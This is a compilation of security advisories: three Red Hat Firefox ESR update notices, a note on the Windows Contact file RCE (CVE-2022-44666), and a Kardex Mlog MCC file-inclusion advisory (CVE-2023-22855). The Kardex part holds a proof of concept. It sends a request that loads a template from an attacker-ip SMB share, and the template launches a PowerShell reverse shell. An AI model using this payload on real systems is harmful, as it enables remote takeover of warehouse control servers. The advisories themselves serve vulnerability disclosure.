Red Hat Security Advisory 2023-0807-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.8.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:0807-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0807  
Issue date:        2023-02-20  
CVE Names:         CVE-2023-0767 CVE-2023-25728 CVE-2023-25729   
                   CVE-2023-25730 CVE-2023-25732 CVE-2023-25735   
                   CVE-2023-25737 CVE-2023-25739 CVE-2023-25742   
                   CVE-2023-25743 CVE-2023-25744 CVE-2023-25746   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.8.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary memory write via PKCS 12 in NSS (CVE-2023-0767)

* Mozilla: Content security policy leak in violation reports using iframes  
(CVE-2023-25728)

* Mozilla: Screen hijack via browser fullscreen mode (CVE-2023-25730)

* Mozilla: Potential use-after-free from compartment mismatch in  
SpiderMonkey (CVE-2023-25735)

* Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
(CVE-2023-25737)

* Mozilla: Use-after-free in  
mozilla::dom::ScriptLoadContext::~ScriptLoadContext (CVE-2023-25739)

* Mozilla: Fullscreen notification not shown in Firefox Focus  
(CVE-2023-25743)

* Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
(CVE-2023-25744)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.8 (CVE-2023-25746)

* Mozilla: Extensions could have opened external schemes without user  
knowledge (CVE-2023-25729)

* Mozilla: Out of bounds memory write from EncodeInputStream  
(CVE-2023-25732)

* Mozilla: Web Crypto ImportKey crashes tab (CVE-2023-25742)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2170374 - CVE-2023-25728 Mozilla: Content security policy leak in violation reports using iframes  
2170375 - CVE-2023-25730 Mozilla: Screen hijack via browser fullscreen mode  
2170376 - CVE-2023-25743 Mozilla: Fullscreen notification not shown in Firefox Focus  
2170377 - CVE-2023-0767 Mozilla: Arbitrary memory write via PKCS 12 in NSS  
2170378 - CVE-2023-25735 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey  
2170379 - CVE-2023-25737 Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
2170381 - CVE-2023-25739 Mozilla: Use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext  
2170382 - CVE-2023-25729 Mozilla: Extensions could have opened external schemes without user knowledge  
2170383 - CVE-2023-25732 Mozilla: Out of bounds memory write from EncodeInputStream  
2170390 - CVE-2023-25742 Mozilla: Web Crypto ImportKey crashes tab  
2170391 - CVE-2023-25744 Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
2170402 - CVE-2023-25746 Mozilla: Memory safety bugs fixed in Firefox ESR 102.8

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
firefox-102.8.0-2.el8_6.src.rpm

aarch64:  
firefox-102.8.0-2.el8_6.aarch64.rpm  
firefox-debuginfo-102.8.0-2.el8_6.aarch64.rpm  
firefox-debugsource-102.8.0-2.el8_6.aarch64.rpm

ppc64le:  
firefox-102.8.0-2.el8_6.ppc64le.rpm  
firefox-debuginfo-102.8.0-2.el8_6.ppc64le.rpm  
firefox-debugsource-102.8.0-2.el8_6.ppc64le.rpm

s390x:  
firefox-102.8.0-2.el8_6.s390x.rpm  
firefox-debuginfo-102.8.0-2.el8_6.s390x.rpm  
firefox-debugsource-102.8.0-2.el8_6.s390x.rpm

x86_64:  
firefox-102.8.0-2.el8_6.x86_64.rpm  
firefox-debuginfo-102.8.0-2.el8_6.x86_64.rpm  
firefox-debugsource-102.8.0-2.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/cve/CVE-2023-25728  
https://access.redhat.com/security/cve/CVE-2023-25729  
https://access.redhat.com/security/cve/CVE-2023-25730  
https://access.redhat.com/security/cve/CVE-2023-25732  
https://access.redhat.com/security/cve/CVE-2023-25735  
https://access.redhat.com/security/cve/CVE-2023-25737  
https://access.redhat.com/security/cve/CVE-2023-25739  
https://access.redhat.com/security/cve/CVE-2023-25742  
https://access.redhat.com/security/cve/CVE-2023-25743  
https://access.redhat.com/security/cve/CVE-2023-25744  
https://access.redhat.com/security/cve/CVE-2023-25746  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/NniNzjgjWX9erEAQhNyw//SSbLL+2xLIhGVB8UVcBgBIg4VoUnNTix  
NTDYOfM0mXy2YzMISu3Sxn68aAcWQvbjWb58PEROCfZx/cleei0irJvqCutqeOzu  
ysqugE1d9oJspGI1Em4UdCdr09VfJtmJJPpPVlmf4bEv8XXKKLQoIwluGLdhSxoH  
IoKJsllMNMMv0B3bRuJ9JO4RbHqmlHfW00BzrMG2Hxsr5DJRpujJJzbYv3sTvxbo  
+aRzzl2CjsqqY7y+AfwsrF48XhUnCCnbaPZWH/gdzpNl6nzxy6b2Q09qpz0qrhTc  
/Xv4YZp+wNKHBbp53B1ygwO92XS9dJyF2u8v43CE/ZPgMflSSG+dm11EeetFHZW/  
k95g+F8qRpfIZNX7kaudaTm4e6YqXu1ZBoxzk1/ZBi/opxXeBIsXsA0aPDRFrplk  
xRN6AYOQ4t3G3mrHX9i4rnmLLQiR9j4jwUKEB0UrJJIJvaF0lD4V6ckSOVfnuUT5  
Ae7cWv0gnV/Mxigatw9gWIIp/tByBc+TGPuHlvl/G7fXk22z8yEumt0cNtIeA2sH  
CFmGvOWl61iWpTgsES4P7XQICssJvhcMh/sPZBYq4qUh/4vi1UEL0ZmrlwrKh0Mb  
vAvHyXaup9Lq7MzJvCOHY8Ax9dYYcrx0RaZ76kolcfqToZJPibAUQK9N5U33uvnp  
xhd5wQMwPa0=  
=F1gf  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0807-01

Red Hat Security Advisory 2023-0812-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.8.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:0812-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0812  
Issue date:        2023-02-20  
CVE Names:         CVE-2023-0767 CVE-2023-25728 CVE-2023-25729   
                   CVE-2023-25730 CVE-2023-25732 CVE-2023-25735   
                   CVE-2023-25737 CVE-2023-25739 CVE-2023-25742   
                   CVE-2023-25743 CVE-2023-25744 CVE-2023-25746   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.8.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary memory write via PKCS 12 in NSS (CVE-2023-0767)

* Mozilla: Content security policy leak in violation reports using iframes  
(CVE-2023-25728)

* Mozilla: Screen hijack via browser fullscreen mode (CVE-2023-25730)

* Mozilla: Potential use-after-free from compartment mismatch in  
SpiderMonkey (CVE-2023-25735)

* Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
(CVE-2023-25737)

* Mozilla: Use-after-free in  
mozilla::dom::ScriptLoadContext::~ScriptLoadContext (CVE-2023-25739)

* Mozilla: Fullscreen notification not shown in Firefox Focus  
(CVE-2023-25743)

* Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
(CVE-2023-25744)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.8 (CVE-2023-25746)

* Mozilla: Extensions could have opened external schemes without user  
knowledge (CVE-2023-25729)

* Mozilla: Out of bounds memory write from EncodeInputStream  
(CVE-2023-25732)

* Mozilla: Web Crypto ImportKey crashes tab (CVE-2023-25742)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2170374 - CVE-2023-25728 Mozilla: Content security policy leak in violation reports using iframes  
2170375 - CVE-2023-25730 Mozilla: Screen hijack via browser fullscreen mode  
2170376 - CVE-2023-25743 Mozilla: Fullscreen notification not shown in Firefox Focus  
2170377 - CVE-2023-0767 Mozilla: Arbitrary memory write via PKCS 12 in NSS  
2170378 - CVE-2023-25735 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey  
2170379 - CVE-2023-25737 Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
2170381 - CVE-2023-25739 Mozilla: Use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext  
2170382 - CVE-2023-25729 Mozilla: Extensions could have opened external schemes without user knowledge  
2170383 - CVE-2023-25732 Mozilla: Out of bounds memory write from EncodeInputStream  
2170390 - CVE-2023-25742 Mozilla: Web Crypto ImportKey crashes tab  
2170391 - CVE-2023-25744 Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
2170402 - CVE-2023-25746 Mozilla: Memory safety bugs fixed in Firefox ESR 102.8

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
firefox-102.8.0-2.el7_9.src.rpm

x86_64:  
firefox-102.8.0-2.el7_9.x86_64.rpm  
firefox-debuginfo-102.8.0-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
firefox-102.8.0-2.el7_9.i686.rpm  
firefox-debuginfo-102.8.0-2.el7_9.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
firefox-102.8.0-2.el7_9.src.rpm

ppc64:  
firefox-102.8.0-2.el7_9.ppc64.rpm  
firefox-debuginfo-102.8.0-2.el7_9.ppc64.rpm

ppc64le:  
firefox-102.8.0-2.el7_9.ppc64le.rpm  
firefox-debuginfo-102.8.0-2.el7_9.ppc64le.rpm

s390x:  
firefox-102.8.0-2.el7_9.s390x.rpm  
firefox-debuginfo-102.8.0-2.el7_9.s390x.rpm

x86_64:  
firefox-102.8.0-2.el7_9.x86_64.rpm  
firefox-debuginfo-102.8.0-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:  
firefox-102.8.0-2.el7_9.i686.rpm  
firefox-debuginfo-102.8.0-2.el7_9.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
firefox-102.8.0-2.el7_9.src.rpm

x86_64:  
firefox-102.8.0-2.el7_9.x86_64.rpm  
firefox-debuginfo-102.8.0-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
firefox-102.8.0-2.el7_9.i686.rpm  
firefox-debuginfo-102.8.0-2.el7_9.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/cve/CVE-2023-25728  
https://access.redhat.com/security/cve/CVE-2023-25729  
https://access.redhat.com/security/cve/CVE-2023-25730  
https://access.redhat.com/security/cve/CVE-2023-25732  
https://access.redhat.com/security/cve/CVE-2023-25735  
https://access.redhat.com/security/cve/CVE-2023-25737  
https://access.redhat.com/security/cve/CVE-2023-25739  
https://access.redhat.com/security/cve/CVE-2023-25742  
https://access.redhat.com/security/cve/CVE-2023-25743  
https://access.redhat.com/security/cve/CVE-2023-25744  
https://access.redhat.com/security/cve/CVE-2023-25746  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/NnhdzjgjWX9erEAQiaJA//fsocU/rayo7s9DNeeFJaS7i3D2mp94om  
rSg4O9c4ZqwX7etBJTv3qM9FFAxY0M50GmVuJd70Jst03FLH/XY7vrUGkmLZmfw0  
YzGxp4o9pOF3tBiIx0ohR39+hGFGiZz40514jS1m6t4+aJP1y5EvTApd2XBMiWRq  
7bUhIShTyvKirsmvZ1kWObTAKI6p0PBPeTB+8odUiB3v9U6OickZ5WlZACSawhLp  
3wJUNisgYR6ORGbhAW3qEKhkOXePOefwOT7GydckszVJmjAibgv+DPYj8dD1szoH  
q4S0D1tgPop7LSBRxHEYwy42Vlww/MVdSf0rsz8c+mCiQXfVNfcqpob29SVmy7NK  
j8A01IrGHvEbwGENmDpyn4kU4VuuaTBotIBSsAStV9NTFkvdtsBcQdMDXCqoPKs+  
rVP1bskHH9Vt6CKLcuYUWBXI8BhSvbL//vwiflZk3z/4W+DDe4tdNnFqCcAyoIPn  
iEr2HJ2ivhcrYWrZ4MlkhMaS+GJ+sEpWxZKuf/SfQQU9hEPV6uqOch+8kPqUgcVj  
HF+OWqeS+MU04msFDliUWNlzjkCVg9XsAy88y/VeQnm3o5NRvUqnfDoOn85Rwigm  
GHQaVqjZMU5fQOYKurAkmXISGfJjuDeO8YdSeSa8iOo6AYpm0SRwUXKai7OgtVq9  
oAvzakdRB7s=  
=tfXq  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0812-01

Red Hat Security Advisory 2023-0806-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.8.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:0806-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0806  
Issue date:        2023-02-20  
CVE Names:         CVE-2023-0767 CVE-2023-25728 CVE-2023-25729   
                   CVE-2023-25730 CVE-2023-25732 CVE-2023-25735   
                   CVE-2023-25737 CVE-2023-25739 CVE-2023-25742   
                   CVE-2023-25743 CVE-2023-25744 CVE-2023-25746   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.8.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary memory write via PKCS 12 in NSS (CVE-2023-0767)

* Mozilla: Content security policy leak in violation reports using iframes  
(CVE-2023-25728)

* Mozilla: Screen hijack via browser fullscreen mode (CVE-2023-25730)

* Mozilla: Potential use-after-free from compartment mismatch in  
SpiderMonkey (CVE-2023-25735)

* Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
(CVE-2023-25737)

* Mozilla: Use-after-free in  
mozilla::dom::ScriptLoadContext::~ScriptLoadContext (CVE-2023-25739)

* Mozilla: Fullscreen notification not shown in Firefox Focus  
(CVE-2023-25743)

* Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
(CVE-2023-25744)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.8 (CVE-2023-25746)

* Mozilla: Extensions could have opened external schemes without user  
knowledge (CVE-2023-25729)

* Mozilla: Out of bounds memory write from EncodeInputStream  
(CVE-2023-25732)

* Mozilla: Web Crypto ImportKey crashes tab (CVE-2023-25742)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2170374 - CVE-2023-25728 Mozilla: Content security policy leak in violation reports using iframes  
2170375 - CVE-2023-25730 Mozilla: Screen hijack via browser fullscreen mode  
2170376 - CVE-2023-25743 Mozilla: Fullscreen notification not shown in Firefox Focus  
2170377 - CVE-2023-0767 Mozilla: Arbitrary memory write via PKCS 12 in NSS  
2170378 - CVE-2023-25735 Mozilla: Potential use-after-free from compartment mismatch in SpiderMonkey  
2170379 - CVE-2023-25737 Mozilla: Invalid downcast in SVGUtils::SetupStrokeGeometry  
2170381 - CVE-2023-25739 Mozilla: Use-after-free in mozilla::dom::ScriptLoadContext::~ScriptLoadContext  
2170382 - CVE-2023-25729 Mozilla: Extensions could have opened external schemes without user knowledge  
2170383 - CVE-2023-25732 Mozilla: Out of bounds memory write from EncodeInputStream  
2170390 - CVE-2023-25742 Mozilla: Web Crypto ImportKey crashes tab  
2170391 - CVE-2023-25744 Mozilla: Memory safety bugs fixed in Firefox 110 and Firefox ESR 102.8  
2170402 - CVE-2023-25746 Mozilla: Memory safety bugs fixed in Firefox ESR 102.8

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
firefox-102.8.0-2.el8_1.src.rpm

ppc64le:  
firefox-102.8.0-2.el8_1.ppc64le.rpm  
firefox-debuginfo-102.8.0-2.el8_1.ppc64le.rpm  
firefox-debugsource-102.8.0-2.el8_1.ppc64le.rpm

x86_64:  
firefox-102.8.0-2.el8_1.x86_64.rpm  
firefox-debuginfo-102.8.0-2.el8_1.x86_64.rpm  
firefox-debugsource-102.8.0-2.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/cve/CVE-2023-25728  
https://access.redhat.com/security/cve/CVE-2023-25729  
https://access.redhat.com/security/cve/CVE-2023-25730  
https://access.redhat.com/security/cve/CVE-2023-25732  
https://access.redhat.com/security/cve/CVE-2023-25735  
https://access.redhat.com/security/cve/CVE-2023-25737  
https://access.redhat.com/security/cve/CVE-2023-25739  
https://access.redhat.com/security/cve/CVE-2023-25742  
https://access.redhat.com/security/cve/CVE-2023-25743  
https://access.redhat.com/security/cve/CVE-2023-25744  
https://access.redhat.com/security/cve/CVE-2023-25746  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/NngtzjgjWX9erEAQigwA/9Fow2DK6sPwk1bpk2vWVOZa3i3IkNEx9b  
SapSanv4Qoi5hoNqdxel7r+ozHHeCw92kDaXQJBnYQ+tN2JkhusYGqF1SzNV3NzF  
Sp3y6SxnFO/gwDbCTGH1vPr0gM74VSZvVcTPbnXxKBJkPo7dAzNpL9OquDZxRNHV  
ZyfRzRicmUHcO3jV3vdRBzap8TFLn5kJwLO/xf8G0o7WeLmhEvsLzzNBs3lpbezy  
pSz2UCaGotbDVoum49PVBxbL2Oe9OdJnVxSV0j1BXmRbN9A7VACdztOAe0HbC916  
cTA7no4qwkIItqiZ6U80+KbsaCygwYuSbCyU2ciSPCzIjA4VdoPH9dG7EcJlWyJK  
Eb7HxXy2pZTz3pf4q4ypQSw7+n93x99G2/pO6GRYe0Mrw8GrOydhpk0O+9GdX+mz  
B0Y+E5R9wzD0YXX/D3eJB7apmlTaGZlpVulK/Tuknr/8UPkaijec3WLaf3j550pA  
6TNqFkWJ7te/wt8EFUIDSe1xs82hq9LafhZ9IH9u2sPuUfsUf3oyLmuTxfh9rO1a  
iS8KE1DWTz2fIrjP05Jo90Ti7kNfeOHk2Vza3Yt/QAKzNXCtVEgwUTZCdHl4GR/5  
YsUjNCN+O9yupndQzghZRr/eIM8fZZUXcDNG8G4ZmNkiAIM6hxVYxwQdRclixv+7  
zxXDLc8F8Dk=  
=VKfU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0806-01

This advisory ties together older research on a contact file handling flaw on Microsoft Windows as well as recent research discovered that uses the same methodologies.

[-] Microsoft Windows Contact file / Remote Code Execution (Resurrected 2022)  / CVE-2022-44666

[+] John Page (aka hyp3rlinx)  
[+] twitter.com/hyp3rlinx  
[+] ISR: ApparitionSec

Back in 2018 I discovered three related Windows remote code execution vulnerabilities affecting both VCF and Contact files.  
They were purchased by Trend Micro Zero Day Initiative (@thezdi) from me and received candidate identifiers ZDI-CAN-6920 and ZDI-CAN-7591.  
Microsoft as usual denied a fix and it was subsequently dropped as a zero day on January 10, 2019 in coordination with the ZDI program.

Almost five years passed, until researcher j00sean resurrected the flaws to add additional protocol vectors LDAP etc.  
Microsoft finally decided to patch and assign CVE-2022-44666 even though the vulnerabilities are exactly the same.

Old 2019 advisories:  
=====================  
1) Windows VCF RCE  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt

2) Windows Contact HTML injection  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt

3) Windows Contact RCE  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt

Circa 2022 updated:  
=====================  
https://github.com/j00sean/CVE-2022-44666#readme  
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-44666

Additional References:  
=======================  
https://www.zerodayinitiative.com/advisories/ZDI-19-013/  
https://www.zdnet.com/article/poc-for-windows-vcf-zero-day-published-online/  
https://thehackernews.com/2019/01/vcard-windows-hacking.html  
https://twitter.com/hyp3rlinx/status/1083528552253919232  
https://seclists.org/bugtraq/2019/Jan/43  
https://vimeo.com/312824315  
https://www.exploit-db.com/exploits/46167  
https://www.rapid7.com/db/modules/exploit/windows/fileformat/microsoft_windows_contact/

Special thanks to j00sean for his work and resurrecting this vulnerability from the dead and helping deal with M$

hyp3rlinx

Microsoft Windows Contact File Remote Code Execution

Kardex Mlog MCC version 5.7.12+0-a203c2a213-master suffers from a file inclusion vulnerability that allows for remote code execution.

Remote Code Execution in Kardex MLOG  
=======================================================================  
       Product: Kardex Mlog MCC  
         Vendor: Kardex Holding AG  
      Tested Version: 5.7.12+0-a203c2a213-master  
         Fixed Version: inline patch - no new version number  
         Vulnerability Type: Improper Control of Generation of Code ("RFI") - CWE-94  
     CVSSv2 Severity: AV:A/AC:L/Au:N/C:C/I:C/A:C - Score 8.3  
            CVSSv3 Severity: AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Score 9.6  
            Solution Status: fixed  
  Manufacturer Notification: 2022-12-13  
       Solution Date: 2023-01-24  
   Public Disclosure: 2023-02-07  
       CVE Reference: CVE-2023-22855  
        Authors of Advisory: Patrick Hener & Nico Viakowski

=======================================================================

Vendor description[1]  
---------------------

Kardex Mlog’s modular software solution Kardex Control Center manages material  
flow and warehouse management processes faster and more efficiently.

 From manual block warehouse and interface networking with intelligent partner  
systems to an automated intralogistics system connected to production lines and  
driverless vehicles, intelligent energy management for the automated stacker  
cranes and modern system visualization, the Kardex Control Center modules offer  
flexible solutions for your warehouse management.

Vulnerability Details  
---------------------

The .NET based software spawns a web interface listening on port 8088.  
This interface is meant to control and monitor the material flow.

The user controllable path is handed to a path concatenation function  
(`Path.Combine`) without proper sanitization. This yields the possibility to  
include local files, as well as remote files (SMB). The path is used in a  
function called `getFile`.

The following code snippet shows the vulnerable part of this function:

```cs  
public MccHttpServerResult GetFile(string path, string acceptEncoding, string queryString = null)  
  {  
    MccHttpServerResult result4;

[... snip ...]

else  
{  
  string getfileName = (path == "/") ? "index.html" : path.Substring(1).Replace("/", Path.DirectorySeparatorChar.ToString(CultureInfo.InvariantCulture));  
  string fileName = Path.Combine(this.RootDirectory(), getfileName);  
  string originalFileName = fileName;  
```

The .Net function `Path.Combine` also is able to concatenate remote targets. For  
example using `\\ipaddress` you can include files from a remote samba server.

Further down the request flow, the application is checking for the MIME type of  
the file retrieved.

Depending on the MIME type the content is either sent through a  
import/export procedure or rendered as `mono/t4` template. The function  
`getMimeType` will return `t4` if the included file is ending with an extension  
of `.t4`.

This is where the File Inclusion can be escalated to a Remote Code Execution.  
The `mono/t4` templating engine allows the use of `C#` to evaluate code.  
This enables an attacker to gain code execution and eventually spawn a reverse  
shell.

```cs  
bool flag15 = File.Exists(fileName);  
  if (flag15)  
    {  
    using (FileStream f = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.ReadWrite))  
    {  
      byte[] bytes = new byte[f.Length];  
      f.Read(bytes, 0, bytes.Length);  
      bool flag16 = mime2 == "t4";  
      if (flag16)  
        {  
          return this.runTemplatingEngine(bytes, responseHeaders, queryString);  
        }  
```

Proof of Concept (PoC)  
----------------------

The following request will include a remote file from an smb share. For this to  
work the attacker has to spawn an smb server (for example using `smbserver.py`  
from Impacket[2]).

```  
GET /\\attacker-ip/share/exploit.t4 HTTP/1.1  
Host: vulnerable.host.internal:8088  
Content-Type: text/html  
User-Agent: curl/7.86.0  
Accept: */*  
Connection: close  
```

The `exploit.t4` looks like this:

```html  
<#@ template language="C#" #>  
<#@ Import Namespace="System" #>  
<#@ Import Namespace="System.Diagnostics" #>

Proof of Concept - SSTI to RCE  
RCE running ...

<#  
var proc1 = new ProcessStartInfo();  
string anyCommand;  
anyCommand = "powershell -e revshell-base64-blob";

proc1.UseShellExecute = true;  
proc1.WorkingDirectory = @"C:\Windows\System32";  
proc1.FileName = @"C:\Windows\System32\cmd.exe";  
proc1.Verb = "runas";  
proc1.Arguments = "/c "+anyCommand;  
Process.Start(proc1);  
#>

Enjoy your shell, good sir :D  
```

The exploit above will execute `cmd.exe` and launch a `powershell` to execute  
a reverse shell. You can easily generate a reverse shell blob using  
revshells.com[3].

A full exploit spawning a reverse shell was created[4].

Solution  
--------

The user supplied data should be sanitized before using it in the `Path.Combine`  
function.

Disclosure Timeline  
-------------------

2022-12-13: Vulnerability discovered  
2022-12-13: Vulnerability reported to manufacturer  
2023-01-24: Solution provided by manufacturer  
2023-02-07: Public disclosure of vulnerability

References  
----------

[1] Vendor Website:https://www.kardex.com/en/mlog-control-center  
[2] Impacket Git Repository:https://github.com/SecureAuthCorp/impacket  
[3] Reverse Shell Generator:https://www.revshells.com/  
[4] Exploit on Exploit-DB (tbd):https://www.exploit-db.com/exploits/xxxxx    
[5] Blog Post Advisory:https://hesec.de/posts/cve-2023-22855     
[6] Personal Github Repo for Advisory:https://github.com/patrickhener/CVE-2023-22855     
[7] Blog Post Thinking Objects:https://to.com/blog/advisory-kardex-mlog-CVE-2023-22855   

Credits  
-------

This security vulnerability was found by Patrick Hener and Nico Viakowski.

E-Mail:patrickhener@posteo.de  
E-Mail:n.viakowski@pm.me  

Disclaimer  
----------

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible.

Copyright  
---------

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en

Kardex Mlog MCC 5.7.12+0-a203c2a213-master File Inclusion / Remote Code Execution

